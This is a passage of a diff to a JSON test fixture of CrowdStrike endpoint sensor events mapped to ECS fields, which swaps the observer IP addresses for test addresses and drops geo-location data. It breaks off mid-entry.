"{\"event_simpleName\":\"AsepFileChange\",\"ContextTimeStamp\":\"1625677482.148\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364936256754041721\",\"ContextThreadId\":\"0\",\"aip\":\"208.140.108.235\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"AsepFileChangeMacV1\",\"id\":\"ffffffff-1111-11eb-9e50-064be6e56df7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffff1a64286a233d09974b1b377\",\"timestamp\":\"1625677482403\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs\",\"VnodeModificationType\":\"6\"}", + "ingested": "2021-12-09T13:36:11.150974900Z", + "original": "{\"event_simpleName\":\"AsepFileChange\",\"ContextTimeStamp\":\"1625677482.148\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364936256754041721\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"AsepFileChangeMacV1\",\"id\":\"ffffffff-1111-11eb-9e50-064be6e56df7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffff1a64286a233d09974b1b377\",\"timestamp\":\"1625677482403\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs\",\"VnodeModificationType\":\"6\"}", "created": "2021-07-07T17:04:42.403Z", "kind": "event", "action": "AsepFileChange", @@ -5632,21 +4956,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.194.125.248", - "vendor": "crowdstrike", - "ip": "208.194.125.248", "serial_number": "ffffffffdd094539a02b394c69a70aaf", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0010912.1" + "version": "1007.8.0010912.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:10.959Z", "ecs": { @@ -5654,18 +4969,18 @@ }, "related": { "hosts": [ - "208.194.125.248" + "67.43.156.14" ], "hash": [ "1284133626" ], "ip": [ - "208.194.125.248" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465867300Z", - "original": "{\"event_simpleName\":\"TerminateProcess\",\"RawProcessId\":\"76482\",\"ContextTimeStamp\":\"1625677510.959\",\"ConfigStateHash\":\"1284133626\",\"ContextProcessId\":\"130732827553316\",\"ContextThreadId\":\"0\",\"aip\":\"208.194.125.248\",\"ConfigBuild\":\"1007.8.0010912.1\",\"event_platform\":\"Lin\",\"TargetProcessId\":\"130732827553316\",\"Entitlements\":\"15\",\"name\":\"TerminateProcessLinV2\",\"id\":\"ffffffff-1111-11eb-97d0-02b2813216eb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffdd094539a02b394c69a70aaf\",\"timestamp\":\"1625677511067\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150981100Z", + "original": "{\"event_simpleName\":\"TerminateProcess\",\"RawProcessId\":\"76482\",\"ContextTimeStamp\":\"1625677510.959\",\"ConfigStateHash\":\"1284133626\",\"ContextProcessId\":\"130732827553316\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0010912.1\",\"event_platform\":\"Lin\",\"TargetProcessId\":\"130732827553316\",\"Entitlements\":\"15\",\"name\":\"TerminateProcessLinV2\",\"id\":\"ffffffff-1111-11eb-97d0-02b2813216eb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffdd094539a02b394c69a70aaf\",\"timestamp\":\"1625677511067\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.067Z", "kind": "event", "action": "TerminateProcess", @@ -5689,21 +5004,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.31.114.187", - "vendor": "crowdstrike", - "ip": "208.31.114.187", "serial_number": "ffffffff70cf4070af024397f25007c7", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:52.544Z", "os": { @@ -5714,18 +5020,18 @@ }, "related": { "hosts": [ - "208.31.114.187" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.31.114.187" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465874Z", - "original": "{\"ConfigBuild\":\"1007.4.0013701.1\",\"event_simpleName\":\"FirewallEnabled\",\"event_platform\":\"Mac\",\"ConfigStateHash\":\"3090255842\",\"Entitlements\":\"15\",\"name\":\"FirewallEnabledMacV1\",\"aip\":\"208.31.114.187\",\"id\":\"ffffffff-1111-11eb-a9e6-067d21325a03\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff70cf4070af024397f25007c7\",\"timestamp\":\"1625677372544\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150987400Z", + "original": "{\"ConfigBuild\":\"1007.4.0013701.1\",\"event_simpleName\":\"FirewallEnabled\",\"event_platform\":\"Mac\",\"ConfigStateHash\":\"3090255842\",\"Entitlements\":\"15\",\"name\":\"FirewallEnabledMacV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-a9e6-067d21325a03\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff70cf4070af024397f25007c7\",\"timestamp\":\"1625677372544\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:52.544Z", "kind": "event", "action": "FirewallEnabled", @@ -5755,24 +5061,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-NY", - "city_name": "Lakewood", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "New York", - "location": { - "lon": -79.3291, - "lat": 42.0973 - } - }, - "address": "208.105.245.7", - "vendor": "crowdstrike", - "ip": "208.105.245.7", "serial_number": "ffffffffed984e248973f3ada1eb543d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:12.283Z", "os": { @@ -5783,18 +5077,18 @@ }, "related": { "hosts": [ - "208.105.245.7" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.105.245.7" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465880700Z", - "original": "{\"event_simpleName\":\"FsVolumeUnmounted\",\"VolumeName\":\"Install Google Drive\",\"ContextTimeStamp\":\"1625677332.283\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.105.245.7\",\"VolumeMediaBSDName\":\"disk2s2\",\"VolumeMountPoint\":\"/private/tmp/KSInstallAction.dn6J5Xa1M4/m\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"FsVolumeUnmountedMacV1\",\"id\":\"ffffffff-1111-11eb-8fd9-06866dcbd3d5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffed984e248973f3ada1eb543d\",\"timestamp\":\"1625677334451\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", + "ingested": "2021-12-09T13:36:11.150997400Z", + "original": "{\"event_simpleName\":\"FsVolumeUnmounted\",\"VolumeName\":\"Install Google Drive\",\"ContextTimeStamp\":\"1625677332.283\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"VolumeMediaBSDName\":\"disk2s2\",\"VolumeMountPoint\":\"/private/tmp/KSInstallAction.dn6J5Xa1M4/m\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"FsVolumeUnmountedMacV1\",\"id\":\"ffffffff-1111-11eb-8fd9-06866dcbd3d5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffed984e248973f3ada1eb543d\",\"timestamp\":\"1625677334451\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:02:14.451Z", "kind": "event", "action": "FsVolumeUnmounted", @@ -5854,21 +5148,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.231.69.37", - "vendor": "crowdstrike", - "ip": "208.231.69.37", "serial_number": "ffffffff2a0d484da8f7a9cf8bde7164", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:34.525Z", "ecs": { @@ -5876,20 +5161,20 @@ }, "related": { "hosts": [ - "208.231.69.37", + "67.43.156.14", "0.0.0.0" ], "hash": [ "2300098580" ], "ip": [ - "208.231.69.37", + "67.43.156.14", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465887400Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677474.525\",\"ConfigStateHash\":\"2300098580\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"328911864662804336\",\"RemotePort\":\"0\",\"aip\":\"208.231.69.37\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"23165\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4LinV5\",\"id\":\"ffffffff-1111-11eb-88fd-06a17d0fdc05\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff2a0d484da8f7a9cf8bde7164\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677474879\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151003800Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677474.525\",\"ConfigStateHash\":\"2300098580\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"328911864662804336\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"23165\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4LinV5\",\"id\":\"ffffffff-1111-11eb-88fd-06a17d0fdc05\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff2a0d484da8f7a9cf8bde7164\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677474879\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:34.879Z", "kind": "event", "action": "NetworkListenIP4", @@ -5929,21 +5214,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.116.10", - "vendor": "crowdstrike", - "ip": "208.24.116.10", "serial_number": "ffffffff28414c2293e35c360213e723", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:26.828Z", "file": { @@ -5963,20 +5239,20 @@ }, "related": { "hosts": [ - "208.24.116.10" + "67.43.156.14" ], "hash": [ "35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027", "1620585913" ], "ip": [ - "208.24.116.10" + "67.43.156.14" ] }, "event": { "action": "ELFFileWritten", - "ingested": "2021-11-22T09:23:55.465894200Z", - "original": "{\"event_simpleName\":\"ELFFileWritten\",\"ContextTimeStamp\":\"1625677526.828\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"363122200934575406\",\"Size\":\"38798952\",\"ContextThreadId\":\"0\",\"aip\":\"208.24.116.10\",\"SHA256HashData\":\"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027\",\"FileIdentifier\":\"040000010000000000000000000000006793f80200000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ELFFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"ELFSubType\":\"4\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677527114\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe\"}", + "ingested": "2021-12-09T13:36:11.151010100Z", + "original": "{\"event_simpleName\":\"ELFFileWritten\",\"ContextTimeStamp\":\"1625677526.828\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"363122200934575406\",\"Size\":\"38798952\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027\",\"FileIdentifier\":\"040000010000000000000000000000006793f80200000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ELFFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"ELFSubType\":\"4\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677527114\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe\"}", "id": "ffffffff-1111-11eb-985c-02152dd35bc1", "created": "2021-07-07T17:05:27.114Z" }, @@ -5991,21 +5267,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffff2d1245c0a32d5efcf9351272", + "address": "67.43.156.14", "type": "agent", - "version": "6.19.11611.0" + "version": "6.19.11611.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:03.466Z", "os": { @@ -6017,18 +5284,18 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "3712162471" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465900900Z", - "original": "{\"MajorVersion\":\"4\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a\",\"BootArgs\":\"BOOT_IMAGE\\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\\u003dUUID\\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\\u003dtty0 console\\u003dttyS0,115200n8 net.ifnames\\u003d0 biosdevname\\u003d0 nvme_core.io_timeout\\u003d4294967295 rd.emergency\\u003dpoweroff rd.shell\\u003d0\",\"ConfigStateHash\":\"3712162471\",\"AgentVersion\":\"6.19.11611.0\",\"aip\":\"208.203.151.21\",\"MinorVersion\":\"14\",\"OSVersionString\":\"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"OsVersionInfoLinV4\",\"RFMState\":\"1\",\"id\":\"ffffffff-1111-11eb-93d4-0624c36f3a79\",\"OSVersionFileName\":\"/etc/os-release\",\"aid\":\"ffffffff2d1245c0a32d5efcf9351272\",\"timestamp\":\"1625677383466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151016300Z", + "original": "{\"MajorVersion\":\"4\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a\",\"BootArgs\":\"BOOT_IMAGE\\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\\u003dUUID\\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\\u003dtty0 console\\u003dttyS0,115200n8 net.ifnames\\u003d0 biosdevname\\u003d0 nvme_core.io_timeout\\u003d4294967295 rd.emergency\\u003dpoweroff rd.shell\\u003d0\",\"ConfigStateHash\":\"3712162471\",\"AgentVersion\":\"6.19.11611.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"14\",\"OSVersionString\":\"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"OsVersionInfoLinV4\",\"RFMState\":\"1\",\"id\":\"ffffffff-1111-11eb-93d4-0624c36f3a79\",\"OSVersionFileName\":\"/etc/os-release\",\"aid\":\"ffffffff2d1245c0a32d5efcf9351272\",\"timestamp\":\"1625677383466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:03.466Z", "kind": "event", "action": "OsVersionInfo", @@ -6088,21 +5355,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.154.14", - "vendor": "crowdstrike", - "ip": "208.216.154.14", "serial_number": "ffffffff761b4a7d9962dd9e7e776044", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:03:59.099Z", "file": { @@ -6117,18 +5375,18 @@ }, "related": { "hosts": [ - "208.216.154.14" + "67.43.156.13" ], "hash": [ "3090255842" ], "ip": [ - "208.216.154.14" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465907500Z", - "original": "{\"event_simpleName\":\"CriticalFileModified\",\"ContextTimeStamp\":\"1625677439.099\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364849347227309005\",\"ContextThreadId\":\"0\",\"aip\":\"208.216.154.14\",\"FileIdentifier\":\"04000001000000000000000000000000cdf3100100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"USN\":\"89566685\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileModifiedMacV2\",\"id\":\"ffffffff-1111-11eb-9262-0268ab613b49\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff761b4a7d9962dd9e7e776044\",\"timestamp\":\"1625677439398\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/user9.plist/\"}", + "ingested": "2021-12-09T13:36:11.151022700Z", + "original": "{\"event_simpleName\":\"CriticalFileModified\",\"ContextTimeStamp\":\"1625677439.099\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364849347227309005\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"04000001000000000000000000000000cdf3100100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"USN\":\"89566685\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileModifiedMacV2\",\"id\":\"ffffffff-1111-11eb-9262-0268ab613b49\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff761b4a7d9962dd9e7e776044\",\"timestamp\":\"1625677439398\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/user9.plist/\"}", "created": "2021-07-07T17:03:59.398Z", "kind": "alert", "action": "CriticalFileModified", @@ -6155,25 +5413,16 @@ "group": { "id": "0" } - } - }, - { - "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.230.229.237", - "vendor": "crowdstrike", - "ip": "208.230.229.237", + } + }, + { + "observer": { "serial_number": "ffffffff01c7450180352a7c58a28fb4", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:49.786Z", "os": { @@ -6184,18 +5433,18 @@ }, "related": { "hosts": [ - "208.230.229.237" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.230.229.237" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465914300Z", - "original": "{\"event_simpleName\":\"NeighborListIP6\",\"ConfigStateHash\":\"3090255842\",\"NeighborList\":\"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|\",\"aip\":\"208.230.229.237\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP6MacV1\",\"id\":\"ffffffff-1111-11eb-ac8a-06b5e1186139\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01c7450180352a7c58a28fb4\",\"timestamp\":\"1625677489786\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151029100Z", + "original": "{\"event_simpleName\":\"NeighborListIP6\",\"ConfigStateHash\":\"3090255842\",\"NeighborList\":\"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP6MacV1\",\"id\":\"ffffffff-1111-11eb-ac8a-06b5e1186139\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01c7450180352a7c58a28fb4\",\"timestamp\":\"1625677489786\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:49.786Z", "kind": "state", "action": "NeighborListIP6", @@ -6246,24 +5495,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-TN", - "city_name": "Nashville", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Tennessee", - "location": { - "lon": -86.7821, - "lat": 36.165 - } - }, - "address": "208.182.203.47", - "vendor": "crowdstrike", - "ip": "208.182.203.47", "serial_number": "ffffffffcebd42c0890d59b54279d3d3", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013806.1" + "version": "1007.4.0013806.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:02.785Z", "file": { @@ -6283,19 +5520,19 @@ "user3" ], "hosts": [ - "208.182.203.47" + "67.43.156.14" ], "hash": [ "359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6", "1325353086" ], "ip": [ - "208.182.203.47" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465920900Z", - "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677382.785\",\"UserName\":\"user3\",\"ConfigStateHash\":\"1325353086\",\"ContextProcessId\":\"364952259879648742\",\"Size\":\"8052\",\"ContextThreadId\":\"0\",\"aip\":\"208.182.203.47\",\"SHA256HashData\":\"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6\",\"FileIdentifier\":\"04000001000000000000000000000000ef07570000000000\",\"ConfigBuild\":\"1007.4.0013806.1\",\"event_platform\":\"Mac\",\"IsOnRemovableDisk\":\"0\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc1-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffcebd42c0890d59b54279d3d3\",\"timestamp\":\"1625677383057\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh\"}", + "ingested": "2021-12-09T13:36:11.151035400Z", + "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677382.785\",\"UserName\":\"user3\",\"ConfigStateHash\":\"1325353086\",\"ContextProcessId\":\"364952259879648742\",\"Size\":\"8052\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6\",\"FileIdentifier\":\"04000001000000000000000000000000ef07570000000000\",\"ConfigBuild\":\"1007.4.0013806.1\",\"event_platform\":\"Mac\",\"IsOnRemovableDisk\":\"0\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc1-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffcebd42c0890d59b54279d3d3\",\"timestamp\":\"1625677383057\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh\"}", "created": "2021-07-07T17:03:03.057Z", "kind": "event", "action": "NewScriptWritten", @@ -6322,21 +5559,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.145.211.220", - "vendor": "crowdstrike", - "ip": "208.145.211.220", "serial_number": "fffffffff2c7432859ff6bbe1a0bd6af", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:03:07.216Z", "os": { @@ -6347,18 +5575,18 @@ }, "related": { "hosts": [ - "208.145.211.220" + "67.43.156.13" ], "hash": [ "1620585913" ], "ip": [ - "208.145.211.220" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465927600Z", - "original": "{\"event_simpleName\":\"SystemCapacity\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"208.145.211.220\",\"CpuClockSpeed\":\"2400000000\",\"PhysicalCoreCount\":\"8\",\"CpuFeaturesMask\":\"7494065083908067\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LogicalCoreCount\":\"16\",\"Entitlements\":\"15\",\"name\":\"SystemCapacityMacV1\",\"CpuVendor\":\"0\",\"CpuProcessorName\":\"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\",\"id\":\"ffffffff-1111-11eb-b714-066001392751\",\"CpuSignature\":\"591597\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"fffffffff2c7432859ff6bbe1a0bd6af\",\"ProcessorPackageCount\":\"1\",\"MemoryTotal\":\"17179869184\",\"timestamp\":\"1625677387216\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.151041700Z", + "original": 